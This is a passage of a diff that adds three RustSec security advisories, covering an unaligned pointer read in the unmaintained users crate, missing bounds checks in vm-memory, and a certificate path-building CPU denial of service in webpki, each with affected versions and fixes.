01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/users/RUSTSEC-2023-0059.md 2023-10-03
15:53:18.000000000 +0200
@@ -0,0 +1,27 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0059"
+package = "users"
+date = "2023-09-10"
+url = "https://github.com/ogham/rust-users/issues/55";
+informational = "unsound"
+keywords = ["unaligned-read"]
+
+[versions]
+patched = []
+```
+
+# Unaligned read of `*const *const c_char` pointer
+
+Affected versions dereference a potentially unaligned pointer. The pointer is
+commonly unaligned in practice, resulting in undefined behavior.
+
+In some build modes, this is observable as a panic followed by abort. In other
+build modes the UB may manifest in some other way, including the possibility of
+working correctly in some architectures.
+
+The crate is not currently maintained, so a patched version is not available.
+
+## Recommended alternatives
+- [`uzers`](https://crates.io/crates/uzers) (an actively maintained fork of
the `users` crate)
+- [`sysinfo`](https://crates.io/crates/sysinfo)
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/vm-memory/RUSTSEC-2023-0056.md
new/advisory-db-20231007/crates/vm-memory/RUSTSEC-2023-0056.md
--- old/advisory-db-20230818/crates/vm-memory/RUSTSEC-2023-0056.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/vm-memory/RUSTSEC-2023-0056.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,29 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0056"
+package = "vm-memory"
+date = "2023-09-01"
+url = "https://github.com/rust-vmm/vm-memory/issues/250";
+references =
["https://github.com/rust-vmm/vm-memory/commit/aff1dd4a5259f7deba56692840f7a2d9ca34c9c8";]
+informational = "unsound"
+categories = ["memory-exposure"]
+cvss = "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
+aliases = ["CVE-2023-41051", "GHSA-49hh-fprx-m68g"]
+
+[affected]
+[affected.functions]
+"vm_memory::volatile_memory::VolatileMemory::get_atomic_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::aligned_as_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::aligned_as_mut" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::get_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::get_array_ref" = ["< 0.12.2"]
+
+[versions]
+patched = [">= 0.12.2"]
+```
+
+# Default functions in VolatileMemory trait lack bounds checks, potentially
leading to out-of-bounds memory accesses
+
+An issue was discovered in the default implementations of the
`VolatileMemory::{get_atomic_ref, aligned_as_ref, aligned_as_mut, get_ref,
get_array_ref}` trait functions, which allows out-of-bounds memory access if
the `VolatileMemory::get_slice` function returns a `VolatileSlice` whose length
is less than the functionâs `count` argument. No implementations of
`get_slice` provided in `vm_memory` are affected. Users of custom
`VolatileMemory` implementations may be impacted if the custom implementation
does not adhere to `get_slice`'s documentation.
+
+The issue started in version 0.1.0 but was fixed in version 0.12.2 by
inserting a check that verifies that the `VolatileSlice` returned by
`get_slice` is of the correct length.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/webpki/RUSTSEC-2023-0052.md
new/advisory-db-20231007/crates/webpki/RUSTSEC-2023-0052.md
--- old/advisory-db-20230818/crates/webpki/RUSTSEC-2023-0052.md 1970-01-01
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/webpki/RUSTSEC-2023-0052.md 2023-10-03
15:53:18.000000000 +0200
@@ -0,0 +1,28 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0052"
+package = "webpki"
+date = "2023-08-22"
+categories = ["denial-of-service"]
+keywords = ["certificate", "path building", "x509"]
+cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+related = ["CVE-2018-16875"]
+aliases = ["GHSA-8qv2-5vq6-g2g7"]
+
+[versions]
+patched = [">= 0.22.2"]
+```
+
+# webpki: CPU denial of service in certificate path building
+
+When this crate is given a pathological certificate chain to validate, it will
+spend CPU time exponential with the number of candidate certificates at each
+step of path building.
+
+Both TLS clients and TLS servers that accept client certificate are affected.
+
+This was previously reported in
+<https://github.com/briansmith/webpki/issues/69> and re-reported recently
+by Luke Malinowski.
+
+webpki 0.22.1 included a partial fix and webpki 0.22.2 added further fixes.
![https://rustsec.org/img/report-vuln-button.svg"](https://rustsec.org/img/report-vuln-button.svg"){kind=link}
